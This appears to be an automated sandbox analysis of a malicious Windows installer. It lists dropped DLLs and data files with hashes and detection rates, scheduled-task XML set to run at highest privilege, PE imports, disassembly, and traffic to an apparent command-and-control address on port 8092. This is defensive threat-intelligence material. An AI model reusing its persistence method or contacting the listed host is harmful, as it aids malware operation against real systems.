              SSDEEP:48:a2f1CPWItdEEB+dlbcTeJjhaYLTxGCv402KcUlWG6QmtN1BbRuqS:InB+7cTkTxGCA02K74tp1x
              MD5:55ED3B347F615FAE9FB0D62EFA642861
              SHA1:2978295CFE6CB8ED8C7D7BCEBF0CB13DCD6C9256
              SHA-256:9C94096638FBAD8F4F41E33012437C149ECD4AB055E56FDDACBD35CBCB2ADCB6
              SHA-512:4AC65E360218AE12205C79C32C057B78065EFDD81C679B706694CE22A5F3838473897617E8C973DD738F312494B01082A4A292176CB6E00E5B29A110B0F2B3A5
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Virustotal, Detection: 19%, Browse
              • Antivirus: Metadefender, Detection: 14%, Browse
              • Antivirus: ReversingLabs, Detection: 41%
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...>.f`...........!......................... ...............................P.............A.........................!..L....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):5120
              Entropy (8bit):4.042717862409682
              Encrypted:false
              SSDEEP:48:a2f1CPWItdEEB+dlbcTeJjhaYLTxGCv402KcUlWG6QmtN1BbRuqS:InB+7cTkTxGCA02K74tp1x
              MD5:55ED3B347F615FAE9FB0D62EFA642861
              SHA1:2978295CFE6CB8ED8C7D7BCEBF0CB13DCD6C9256
              SHA-256:9C94096638FBAD8F4F41E33012437C149ECD4AB055E56FDDACBD35CBCB2ADCB6
              SHA-512:4AC65E360218AE12205C79C32C057B78065EFDD81C679B706694CE22A5F3838473897617E8C973DD738F312494B01082A4A292176CB6E00E5B29A110B0F2B3A5
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Virustotal, Detection: 19%, Browse
              • Antivirus: Metadefender, Detection: 14%, Browse
              • Antivirus: ReversingLabs, Detection: 41%
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...>.f`...........!......................... ...............................P.............A.........................!..L....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dll
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):5120
              Entropy (8bit):4.042717862409682
              Encrypted:false
              SSDEEP:48:a2f1CPWItdEEB+dlbcTeJjhaYLTxGCv402KcUlWG6QmtN1BbRuqS:InB+7cTkTxGCA02K74tp1x
              MD5:55ED3B347F615FAE9FB0D62EFA642861
              SHA1:2978295CFE6CB8ED8C7D7BCEBF0CB13DCD6C9256
              SHA-256:9C94096638FBAD8F4F41E33012437C149ECD4AB055E56FDDACBD35CBCB2ADCB6
              SHA-512:4AC65E360218AE12205C79C32C057B78065EFDD81C679B706694CE22A5F3838473897617E8C973DD738F312494B01082A4A292176CB6E00E5B29A110B0F2B3A5
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Virustotal, Detection: 19%, Browse
              • Antivirus: Metadefender, Detection: 14%, Browse
              • Antivirus: ReversingLabs, Detection: 41%
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...>.f`...........!......................... ...............................P.............A.........................!..L....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dll
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):5120
              Entropy (8bit):4.042717862409682
              Encrypted:false
              SSDEEP:48:a2f1CPWItdEEB+dlbcTeJjhaYLTxGCv402KcUlWG6QmtN1BbRuqS:InB+7cTkTxGCA02K74tp1x
              MD5:55ED3B347F615FAE9FB0D62EFA642861
              SHA1:2978295CFE6CB8ED8C7D7BCEBF0CB13DCD6C9256
              SHA-256:9C94096638FBAD8F4F41E33012437C149ECD4AB055E56FDDACBD35CBCB2ADCB6
              SHA-512:4AC65E360218AE12205C79C32C057B78065EFDD81C679B706694CE22A5F3838473897617E8C973DD738F312494B01082A4A292176CB6E00E5B29A110B0F2B3A5
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Virustotal, Detection: 19%, Browse
              • Antivirus: Metadefender, Detection: 14%, Browse
              • Antivirus: ReversingLabs, Detection: 41%
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...>.f`...........!......................... ...............................P.............A.........................!..L....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\tmpDE28.tmp
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1301
              Entropy (8bit):5.109950989988902
              Encrypted:false
              SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0POLxtn:cbk4oL600QydbQxIYODOLedq3SOj
              MD5:7F3B873F0BEBEC1CA523C1EA10D53D80
              SHA1:3EB161B07F5EF732D6C39DD6BC13E1C3AD3036E4
              SHA-256:E0932A6253B8851243AFF143973201F1F4D88A908DA580AFC1AB83A0EC043CDE
              SHA-512:8C8EB7B8FED0A52CBB0CFA4471C1A7780D50C8D249CD14F0FD590662046D6A6705968C66EDA96A4C0E58D0746E4B6BD9E485C4CDC06D630C7FEA2ECFB86AD107
              Malicious:true
              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
              C:\Users\user\AppData\Local\Temp\tmpE0E8.tmp
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1310
              Entropy (8bit):5.109425792877704
              Encrypted:false
              SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
              MD5:5C2F41CFC6F988C859DA7D727AC2B62A
              SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
              SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
              SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
              Malicious:false
              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
              C:\Users\user\AppData\Local\Temp\xavbedcnsrtbhix
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:data
              Category:dropped
              Size (bytes):11781
              Entropy (8bit):7.984459379386964
              Encrypted:false
              SSDEEP:192:pBenVpIMVi3Lb5zyZXE/yld/gQOEBaX0wZkWVAMrtFW0VzoiSrWP6WQpHWcJcNdD:yVCR52ZXs8dQ1RZkEAmtd1olYWHWcwIE
              MD5:BCB945B4C41466420E84B5CED1F7C5F4
              SHA1:5041C43DEBCC2B9E65D11D658F0FE8C8A45E074F
              SHA-256:B4BC8BCAFC597734DFF776D588DCF7F82C6BA6A1BA96F04A0B384B3F30AA4E24
              SHA-512:645EB26BA2E711C68A1982CB4D93A9432B610B64A92CAFA134ED7219272677F44B1BA7BC27F75FE94CBBB6EF5AA1EB8B33257391FB04FC1BDF04EA4997FFB621
              Malicious:false
              Preview: tD*@J..p............>a..e.6q..{.r.w.z..E.LS.,_N.........._..$....x.!#..l..P3-/."x&..X...4"T.......^....gqs...j",.C=?hf.v.8.OY[D..R../...P...`7......r|.......>H.....3.Z.o.......w........O$. ..g...0:<M.'..m...-iM..=......S........K.e..#e..{3..{i.I../II.O..yO....K....k.E...y.W..".?....S...<.$........<.....d...+%'.6p....7..,^L:..d...8HX...|_ik...b.$.{uw`h.n&0.GQS|.J....HP.V.........jt......~v@...5..HZ!...KP)*..3....9......'.". ....4.0..6.. .68.u./BMkr.ef......U...b3xEF`..vx35ENPZu.Xl....F....c.....I..I........wI....KX.5..../j..(7..9....../J..}...)+..L1N/.....-/.n6(...^]7.......egq....OuLK]..{u2..n..oa:.......G....^m.....szdj.t.#L....LN......:.....1............7......,.a2......8.s8..u..C..q...`jl.[l.....oe^p'.>&..bE.F.j..V./...$.........r...y..{=....}....I[...........y.^AD.O.....K..........A/;5. -,9,.7..:.6......p..eugq>m.t{uw&.R3e.=AC..9S[U.SOO......~....J...}t<.y.G......Iv...RP.....j[...,.....D.......P....W..(....a..a.......aB<d.
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:data
              Category:dropped
              Size (bytes):1856
              Entropy (8bit):7.089541637477408
              Encrypted:false
              SSDEEP:48:IknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhL:HjhDjhDjhDjhDjhDjhDjhDjhL
              MD5:30D23CC577A89146961915B57F408623
              SHA1:9B5709D6081D8E0A570511E6E0AAE96FA041964F
              SHA-256:E2130A72E55193D402B5F43F7F3584ECF6B423F8EC4B1B1B69AD693C7E0E5A9E
              SHA-512:2D5C5747FD04F8326C2CC1FB313925070BC01D3352AFA6C36C167B72757A15F58B6263D96BD606338DA055812E69DDB628A6E18D64DD59697C2F42D1C58CC687
              Malicious:false
              Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:ISO-8859 text, with no line terminators
              Category:dropped
              Size (bytes):8
              Entropy (8bit):3.0
              Encrypted:false
              SSDEEP:3:wFGet:wrt
              MD5:DF854956BB207377B050755321BC7605
              SHA1:1E82091BE0AD796EAF136C55B5AD83D650AE72CA
              SHA-256:0E92D96AF7FB340B34C5C7EEE2AEF7059B5B0181952CE900B27F8A8B8E0FEA2B
              SHA-512:BAB25B65AC0C3F2496924D04DBD89E32029C248350440BBB3C9EF6268AA7E389BFDD9F6982350B6CBD38B107B42D291801671B52129B47F075FC76EF1F128C2D
              Malicious:true
              Preview: .>.c...H
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bak
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:data
              Category:dropped
              Size (bytes):24
              Entropy (8bit):4.501629167387823
              Encrypted:false
              SSDEEP:3:9bzY6oRDIvYk:RzWDI3
              MD5:ACD3FB4310417DC77FE06F15B0E353E6
              SHA1:80E7002E655EB5765FDEB21114295CB96AD9D5EB
              SHA-256:DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
              SHA-512:DA46A917DB6276CD4528CFE4AD113292D873CA2EBE53414730F442B83502E5FAF3D1AE87BFA295ADF01E3B44FDBCE239E21A318BFB2CCD1F4753846CB21F6F97
              Malicious:false
              Preview: 9iH...}Z.4..f..J".C;"a
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:data
              Category:modified
              Size (bytes):64
              Entropy (8bit):5.320159765557392
              Encrypted:false
              SSDEEP:3:9bzY6oRDIvYVsRLY6oRDT6P2bfVn1:RzWDIfRWDT621
              MD5:BB0F9B9992809E733EFFF8B0E562CFD6
              SHA1:F0BAB3CF73A04F5A689E6AFC764FEE9276992742
              SHA-256:C48F04FE7525AA3A3F9540889883F649726233DE021724823720A59B4F37CEAC
              SHA-512:AE4280AA460DC1C0301D458A3A443F6884A0BE37481737B2ADAFD72C33C55F09BED88ED239C91FE6F19CA137AC3CD7C9B8454C21D3F8E759687F701C8B3C7A16
              Malicious:false
              Preview: 9iH...}Z.4..f..J".C;"a9iH...}Z.4..f.~a........~.~.......3.U.
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:data
              Category:dropped
              Size (bytes):327768
              Entropy (8bit):7.999367066417797
              Encrypted:true
              SSDEEP:6144:oX44S90aTiB66x3PlZmqze1d1wI8lkWmtjJ/3Exi:LkjbU7LjGxi
              MD5:2E52F446105FBF828E63CF808B721F9C
              SHA1:5330E54F238F46DC04C1AC62B051DB4FCD7416FB
              SHA-256:2F7479AA2661BD259747BC89106031C11B3A3F79F12190E7F19F5DF65B7C15C8
              SHA-512:C08BA0E3315E2314ECBEF38722DF834C2CB8412446A9A310F41A8F83B4AC5984FCC1B26A1D8B0D58A730FDBDD885714854BDFD04DCDF7F582FC125F552D5C3CA
              Malicious:false
              Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):38
              Entropy (8bit):4.405822250285691
              Encrypted:false
              SSDEEP:3:oNUWJRWHSkV0Cn:oNNJApL
              MD5:0FB77C8DB46E53AD33B0288C4C8A4A14
              SHA1:3FE522409B1B18F07306B6F1691DD73D4B2A6212
              SHA-256:22C5A9F7013302D91E32B386E8B545BDDBB8F749FDC6CB403ACBB583FD3AD8C0
              SHA-512:98A7A9F58366F7C8BB237D0E73AF412105AF017240272B37D28F845C7C1BE26D7751769D0A83A2E485080C902903ABD48A7930D29A96964BB9820AA6754FED4D
              Malicious:false
              Preview: C:\Users\user\Desktop\bGf2H3tXGg.exe

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):5.903583773476114
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:bGf2H3tXGg.exe
              File size:702907
              MD5:f72a7fd231e50f9b43c3dab470364846
              SHA1:1ac9f0876ec8f4b95fb0bbae48c2a5b5d02ed411
              SHA256:fb01157b437b00f34999faa320bb55c8e44bdbb415e9a15503035bfe0e1d40d6
              SHA512:c12bc1d2b74c2f209eadd40c02a56ee4b1a21287ab5b3391118f1fa12971c39dcbe2b8174b43a4d19281680247398140b223e0f00f03896b71aa8aa2352c084e
              SSDEEP:6144:69X0GFb/PdSrw+uHwUa5EIZUNf5F6p363E+r+voPIQLAoxQHHmAOZPBwf9:M0o1+Bvgs36pcoPIWPxUH1F
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f..........H3............@

              File Icon

              Icon Hash:e0d8d8d4d4d8d0e8

              Static PE Info

              General

              Entrypoint:0x403348
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:ced282d9b261d1462772017fe2f6972b

              Entrypoint Preview

              Instruction
              sub esp, 00000184h
              push ebx
              push esi
              push edi
              xor ebx, ebx
              push 00008001h
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 0040A198h
              mov dword ptr [esp+20h], ebx
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [004080B8h]
              call dword ptr [004080BCh]
              and eax, BFFFFFFFh
              cmp ax, 00000006h
              mov dword ptr [0042F42Ch], eax
              je 00007F28E8708C83h
              push ebx
              call 00007F28E870BDE6h
              cmp eax, ebx
              je 00007F28E8708C79h
              push 00000C00h
              call eax
              mov esi, 004082A0h
              push esi
              call 00007F28E870BD62h
              push esi
              call dword ptr [004080CCh]
              lea esi, dword ptr [esi+eax+01h]
              cmp byte ptr [esi], bl
              jne 00007F28E8708C5Dh
              push 0000000Bh
              call 00007F28E870BDBAh
              push 00000009h
              call 00007F28E870BDB3h
              push 00000007h
              mov dword ptr [0042F424h], eax
              call 00007F28E870BDA7h
              cmp eax, ebx
              je 00007F28E8708C81h
              push 0000001Eh
              call eax
              test eax, eax
              je 00007F28E8708C79h
              or byte ptr [0042F42Fh], 00000040h
              push ebp
              call dword ptr [00408038h]
              push ebx
              call dword ptr [00408288h]
              mov dword ptr [0042F4F8h], eax
              push ebx
              lea eax, dword ptr [esp+38h]
              push 00000160h
              push eax
              push ebx
              push 00429850h
              call dword ptr [0040816Ch]
              push 0040A188h

              Rich Headers

              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x5adc8.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x64570x6600False0.66823682598data6.43498570321IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rdata0x80000x13800x1400False0.4625data5.26100389731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0xa0000x255380x600False0.463541666667data4.133728555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc0x380000x5adc80x5ae00False0.0467997764787data2.65052430635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              RT_ICON0x382800x42028data
              RT_ICON0x7a2a80x468GLS_BINARY_LSB_FIRST
              RT_ICON0x7a7100x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
              RT_ICON0x7ccb80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
              RT_ICON0x7dd600x10828dBase III DBT, version number 0, next free block index 40
              RT_ICON0x8e5880x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
              RT_DIALOG0x927b00x100dataEnglishUnited States
              RT_DIALOG0x928b00x11cdataEnglishUnited States
              RT_DIALOG0x929cc0x60dataEnglishUnited States
              RT_GROUP_ICON0x92a2c0x5adata
              RT_MANIFEST0x92a880x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

              Imports

              DLLImport
              ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
              SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
              ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
              USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Apr 8, 2021 17:21:19.430593967 CEST497088092192.168.2.540.71.91.165
              Apr 8, 2021 17:21:19.532866955 CEST80924970840.71.91.165192.168.2.5
              Apr 8, 2021 17:21:19.533004999 CEST497088092192.168.2.540.71.91.165
              Apr 8, 2021 17:21:19.573600054 CEST497088092192.168.2.540.71.91.165
              Apr 8, 2021 17:21:19.693836927 CEST80924970840.71.91.165192.168.2.5
              Apr 8, 2021 17:21:19.693979979 CEST497088092192.168.2.540.71.91.165
              Apr 8, 2021 17:21:19.836230993 CEST80924970840.71.91.165192.168.2.5
              Apr 8, 2021 17:21:19.836409092 CEST497088092192.168.2.540.71.91.165
              Apr 8, 2021 17:21:19.940630913 CEST80924970840.71.91.165192.168.2.5
              Apr 8, 2021 17:21:19.953306913 CEST497088092192.168.2.540.71.91.165
              Apr 8, 2021 17:21:20.106357098 CEST80924970840.71.91.165192.168.2.5
              Apr 8, 2021 17:21:20.116871119 CEST80924970840.71.91.165192.168.2.5
              Apr 8, 2021 17:21:20.116904974 CEST80924970840.71.91.165192.168.2.5
              Apr 8, 2021 17:21:20.116926908 CEST80924970840.71.91.165192.168.2.5
              Apr 8, 2021 17:21:20.116954088 CEST80924970840.71.91.165192.168.2.5
              Apr 8, 2021 17:21:20.117017984 CEST497088092192.168.2.540.71.91.165
              Apr 8, 2021 17:21:20.117078066 CEST497088092192.168.2.540.71.91.165
              Apr 8, 2021 17:21:20.219286919 CEST80924970840.71.91.165192.168.2.5
